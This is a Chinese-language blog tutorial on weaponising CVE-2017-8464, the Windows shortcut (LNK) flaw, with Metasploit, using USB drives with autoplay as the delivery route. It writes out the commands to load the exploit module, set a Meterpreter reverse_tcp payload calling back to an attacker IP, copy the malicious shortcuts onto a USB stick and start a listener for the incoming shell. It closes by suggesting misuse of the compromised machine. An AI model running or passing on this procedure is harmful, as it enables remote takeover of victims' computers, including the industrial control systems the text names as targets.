metasploit震网三代的利用教程

时间:2022-06-08
本文章向大家介绍metasploit震网三代的利用教程,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

首先我们了解一下工控系统

  SCADA系统,广泛应用在堤坝、发电站、炼油厂、大型服务器控制服务方面等等。主要用于高度专业的任务例如水位调度控制、电力网络的控制等等。

  震网三代。因为类似与震网病毒而得此名,他可以把恶意payload藏在u盘,无需做一个全新的badusb,只需要目标机有开启了自动播放,或者访问带有恶意payload的u盘,即可触发漏洞。说起来震网被发现也是很好笑,因为传播到一台老电脑无法触发漏洞而被研究人员发现,震网病毒足足潜了三年。

执行条件:

  目标机器开启自动播放或者访问你的已经配置好震网三代的u盘

主要工具:

  测试系统 windows7一台

  攻击机 ubuntu(带msf)


[mochulog]

我们运行msf5(msf5可支持py脚本,查询漏洞模块飞一般的速度,在下一篇文章我会告诉你们如何安装msf5)

我们运行msf5

运行search命令查找模块路径

search cve-2017-8464   #cve-2017-8464是模块的cve编号

我们使用这个模块

use exploit/windows/fileformat/cve_2017_8464_link_rce

ubuntu下不建议使用root用户生成payload,因为生成后移动文件有点麻烦。

set lhost 192.168.43.76   #我们设置payload和本机的ip地址 set payload windows/meterpreter/reverse_tcp   #payload为meterpreter/reverse_tcp run   #开始生成震网U盘恶意文件

我将告诉你生成这么多payload有什么用。

生成恶意文件后需要用一条命令将隐藏目录(.msf4)里面的文件给移动到可见目录,然后我们可以进行复制操作。

cp - r /home/joe/.msf4/local /home/joe/123

cp -r 复制这个文件夹, 然后加文件原路径 后面是要复制到的文件的路径,123是一个新建文件夹,当复制过去后会先创建一个名字是123的文件夹,然后会把恶意快捷方式复制到文件夹里面。复制完成后我们便可以打开文件夹将里面的文件复制到U盘。

在flash_player后面有一个大写字母,这些是对应u盘的盘符,如果你不知道你的u盘盘符是多少也可以全部保存。只要目标机上有开自动播放或者访问你的u盘,均可被触发漏洞。现在我们切换到监听模块,设置payload和ip后开启监听,把恶意文件上传到windows7并运行里面的FlashPlayerCPLApp.cpl这个文件(因为我没有开自动播放也没有u盘,于是我们打开这个文件。)

use exploit/multi/handler #使用监听模块 set lhost 192.168.43.76 #监听目标shell到本机 set payload windows/meterpreter/reverse_tcp #payload run  #开始监听

当U盘在目标机插入的时候,如果执行成功,我们就会获取到了一个meterpreter会话:

然后我们就可以干羞羞的事情了。

[/mochulog]